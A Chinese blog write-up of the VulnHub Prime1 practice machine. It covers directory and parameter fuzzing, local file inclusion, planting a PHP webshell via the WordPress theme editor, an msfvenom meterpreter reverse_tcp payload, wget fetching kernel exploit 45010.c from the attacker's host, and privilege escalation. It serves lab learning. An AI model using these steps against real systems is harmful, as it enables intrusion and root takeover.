渗透测试——prime1靶场实战演练{常用工具}端口转发

文章目录

    • 概要
    • 信息搜集

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap
扫网段存活ip及端口
在这里插入图片描述
找到除了网关外的ip,开放了80端口,登上去看看
在这里插入图片描述
是一个网站,直接上科技扫一扫目录

 python dirsearch.py -u http://192.168.203.152

在这里插入图片描述
扫从出来了常见的wordpress,nice。
那么就使用wpscan…

wpscan --url http://ip/wordpress/ --e u

在这里插入图片描述
扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。
没有别的关键信息,换几个扫描工具试试了。。。

# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

在这里插入图片描述
找到image.php,index.php,sevret.txt
再看看别的工具

# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

在这里插入图片描述
一样的效果,看来就这些了
再换几个工具试试

dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
这个速度好慢啊,而且结果不是那么明白。
换一个

feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
速度比dirsearch快一点点,结果还是不理想。只扫出来wp。
接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。
在这里插入图片描述
在这里插入图片描述
让我们查看location.txt,试试能看吗。
在这里插入图片描述

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

apt-get install wfuzz wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

在这里插入图片描述
利用file去包含location.txt
在这里插入图片描述
在这里插入图片描述
让我们在其他php页面使用那个参数,那么很明显就剩一个了。
在这里插入图片描述
更换参数发现没啥显示,尝试文件包含试试
在这里插入图片描述
直接包含到大动脉了,
仔细找找看看能有啥发现
在这里插入图片描述
这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,
试试文件包含

在这里插入图片描述
那么这个应该是victor的密码了,尝试ssh登录
在这里插入图片描述

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?
“wordpress”
前面是扫出来了登录页面的
我们去试试看能登陆上吗
在这里插入图片描述
先试试victor
发现直接登录了,
找一下有没有可以写入文件的地方
找到了一处有更新按钮的php文件
在这里插入图片描述
里面还有人留下过东西,那么应该就是这了
那就上大动作
在这里插入图片描述
蚁剑上

在这里插入图片描述
这个是路径

http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就
只能想其他办法了
msfvenom 嗯
因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

在这里插入图片描述

于是我
直接用我昨天做的隔空kali
有兴趣去上一个作品
在这里插入图片描述
服务器开了,kali去连接就行了,接下来的数据都通过服务器处理
在这里插入图片描述

现在才觉得
顺序是多么重要。
在这里插入图片描述
刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

在这里插入图片描述
看见有个45010.c
把他下载下来,


searchsploit -m exploit/linux/local/45010.c

然后上msf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。
然后就把生成的shell的内容复制到secret.php,并更新他,
接着就是msf组合拳
msfconsole
在这里插入图片描述
为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。
在这里插入图片描述
这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件
然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

在这里插入图片描述
因为这个是在蚂蚁中完成的,所以图是这样的
不影响接下来的提权
在这里插入图片描述
在msf里面试试也是不行,
但是我发现靶机是有python的
所以想到了pty伪终端
利用python的pty模块创建一个伪终端,

 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试
在这里插入图片描述
ok了查看root文件夹
在这里插入图片描述
这就是密钥吧
exit退出后使用sudo -l再看看
在这里插入图片描述
发现enc可以以root方法执行
在这里插入图片描述
找了一下备份密码

find / -name '*backup*' 2>dev/nul

在这里插入图片描述
然后去执行enc
在这里插入图片描述
生成了两个文档

需要解密才行
剩下的交给以后的我,
把基础先学会了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/50135.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

尝试带你理解 - 进程地址空间,写时拷贝

序言 在上一篇文章 进程概念以及进程状态&#xff0c;我们提到了 fork 函数&#xff0c;该函数可以帮我们创建一个子进程。在使用 fork 函数时&#xff0c;我们会发现一些奇怪的现象&#xff0c;举个栗子&#xff1a; 1 #include <stdio.h>2 #include <unistd.h>3 …

跟《经济学人》学英文:2024年07月20日这期 The Russell 2000 puts in a historic performance

Why investors have fallen in love with small American firms The Russell 2000 puts in a historic performance 罗素2000指数&#xff1a; 罗素2000指数&#xff08;英语&#xff1a;Russell 2000 Index&#xff09;为罗素3000指数中收录市值最小的2000家&#xff08;排序…

学习笔记 韩顺平 零基础30天学会Java(2024.7.25)

P425 枚举类引出 举了一个例子&#xff0c;季节类创建对象&#xff0c;但是根据Java的规则&#xff0c;可以设置春夏秋冬以外的对象&#xff0c;而且可以修改&#xff0c;这样就会不符合实际&#xff0c;因此引出枚举 P426 自定义枚举类 1.构造器私有化&#xff0c;使外面没有办…

深入解析 GPT-4o mini:强大功能与创新应用

&#x1f4e2;博客主页&#xff1a;https://blog.csdn.net/2301_779549673 &#x1f4e2;欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; 如有错误敬请指正&#xff01; &#x1f4e2;本文由 JohnKi 原创&#xff0c;首发于 CSDN&#x1f649; &#x1f4e2;未来很长&#…

C++ 列式内存布局数据存储格式 Arrow

Apache Arrow 优点 : 高性能数据处理&#xff1a; Arrow 使用列式内存布局&#xff0c;这特别适合于数据分析和查询操作&#xff0c;因为它允许对数据进行高效批量处理&#xff0c;减少CPU缓存未命中&#xff0c;从而提升处理速度。 零拷贝数据共享&#xff1a; Arrow …

【YashanDB知识库】yasdb jdbc驱动集成druid连接池,业务(java)日志中有token IDENTIFIER start异常

问题现象 客户的java日志中有如下异常信息&#xff1a; 问题的风险及影响 对正常的业务流程无影响&#xff0c;但是影响druid的merge sql功能&#xff08;此功能会将sql语句中的字面量替换为绑定变量&#xff0c;然后将替换以后的sql视为同一个&#xff0c;然后用做执行性能统…

Vue3扁平化Tree组件的前端分页实现

大家好&#xff0c;我是小卷。得益于JuanTree的扁平化设计&#xff0c;在数据量很大的情况下除了懒加载&#xff0c;使用前端分页也是一种解决渲染性能问题的可选方案。 用法 要实现的文档&#xff1a; 分页效果&#xff1a; 实现 新增属性&#xff1a; 组件setup方法中新增…

程序员加班现象:成因、影响与应对策略

&#x1f34e;个人博客&#xff1a;个人主页 &#x1f3c6;个人专栏&#xff1a;日常聊聊 ⛳️ 功不唐捐&#xff0c;玉汝于成 目录 前言 正文 加班的成因 加班的影响 应对策略 结语 我的其他博客 前言 在现代科技行业中&#xff0c;加班现象已成为一个普遍存在的问题…

配置sublime的中的C++编译器(.sublime-build),实现C++20

GCC 4.8: 支持 C11 (部分) GCC 4.9: 支持 C11 和 C14 (部分) GCC 5: 完全支持 C14 GCC 6: 支持 C14 和 C17 (部分) GCC 7: 支持 C17 (大部分) GCC 8: 完全支持 C17&#xff0c;部分支持 C20 GCC 9: 支持更多的 C20 特性 GCC 10: 支持大部分 C20 特性 GCC 11: 更全面地支持 C20 …

ES中的数据类型学习之ARRAY

Arrays | Elasticsearch Guide [7.17] | Elastic 中文翻译 &#xff1a;Array Elasticsearch 5.4 中文文档 看云 Arrays In Elasticsearch, there is no dedicated array data type. Any field can contain zero or more values by default, however, all values in the a…

SpringBoot 自动配置原理

一、Condition Condition 是在 Spring 4.0 增加的条件判断功能&#xff0c;通过这个可以功能可以实现选择性的创建 Bean 操 作。 思考&#xff1a; SpringBoot 是如何知道要创建哪个 Bean 的&#xff1f;比如 SpringBoot 是如何知道要创建 RedisTemplate 的&#xff1f; …

mysql的B+树索引结构介绍

一、B树 特性&#xff1a; 所有的叶子结点中包含了全部关键字的信息&#xff0c;非叶子节点只存储键值信息&#xff0c;及指向含有这些关键字记录的指针&#xff0c;且叶子结点本身依关键字的大小自小而大的顺序链接&#xff0c;所有的非终端结点可以看成是索引部分&#xff0…

MySQL数据库基本用法

了解数据库基本概念 什么是数据库&#xff1f; • 长期存放在计算机内&#xff0c;有组织、可共享的大量数据的集合&#xff0c;是一个数据“仓库” MySQL数据库的特点 • 开源免费&#xff0c;小巧但功能齐全 • 可在Windows和Linux系统上运行 • 操作方便&#xff0c;…

昇思25天学习打卡营第22天|munger85

LSTMCRF序列标注 我们希望得到这个模型来对词进行标注&#xff0c;B是开始&#xff0c;I是实体词的非开始&#xff0c;O是非实体词。 我们首先需要lstm对序列里token的记忆&#xff0c;和计算每个token发到crf的分数&#xff0c;发完了再退出来&#xff0c;最后形成1模型。那么…

免费可视化工具大显身手:公司财务报表一键生成

面对海量的财务数据&#xff0c;如何快速、准确地提炼出有价值的信息&#xff0c;并以直观易懂的方式呈现给管理层及利益相关者&#xff0c;成为了每一家企业面临的重大挑战。 传统财务报表编制过程繁琐&#xff0c;不仅耗时耗力&#xff0c;还容易出错。而一些可视化工具&…

Java学习笔记(四)控制流程语句、循环、跳转控制语句

Hi i,m JinXiang ⭐ 前言 ⭐ 本篇文章主要介绍Java控制流程语句、循环、跳转控制语句使用以及部分理论知识 &#x1f349;欢迎点赞 &#x1f44d; 收藏 ⭐留言评论 &#x1f4dd;私信必回哟&#x1f601; &#x1f349;博主收将持续更新学习记录获&#xff0c;友友们有任何问题…

Java多线线程-----等待唤醒机制(wait notify)

目录 一.等待唤醒机制简介&#xff1a; 二.synchronized,wait(),notify(): 三.等待唤醒机制案例: 例题一&#xff1a; 例题二&#xff1a; 四.什么时候释放锁—wait&#xff08;&#xff09;、notify&#xff08;&#xff09; 一.等待唤醒机制简介&#xff1a; 由于线程之…

pyqt5制作音乐播放器(第三版)

这次接入了数据库&#xff0c;增加了翻页模式&#xff0c;更新了功能跳转之间的细节 数据设计&#xff1a; 收藏 like1时表示被收藏&#xff0c;展示show0的时候表示表数据被搜索 from peewee import Model, PrimaryKeyField, CharField, BooleanField, MySQLDatabase,Integer…

【区块链+绿色低碳】基于区块链的碳排放管理系统 | FISCO BCOS应用案例

目前业内的碳排放核查方式主要依靠于第三方人工核查、手动填报数据&#xff0c;然后由具备有认证资质的机构进行核验 盖章。但在此过程中存在数据造假的情况&#xff0c;给碳排放量核算的准确性、可靠性带来挑战。 中科易云采用国产开源联盟链 FISCO BCOS&#xff0c;推出基于…

搭建博客系统#Golang

WANLI 博客系统 项目介绍 基于vue3和gin框架开发的前后端分离个人博客系统&#xff0c;包含md格式的文本编辑展示&#xff0c;点赞评论收藏&#xff0c;新闻热点&#xff0c;匿名聊天室&#xff0c;文章搜索等功能。 项目已经部署并运行&#xff0c;快速开发可以查看博客&am…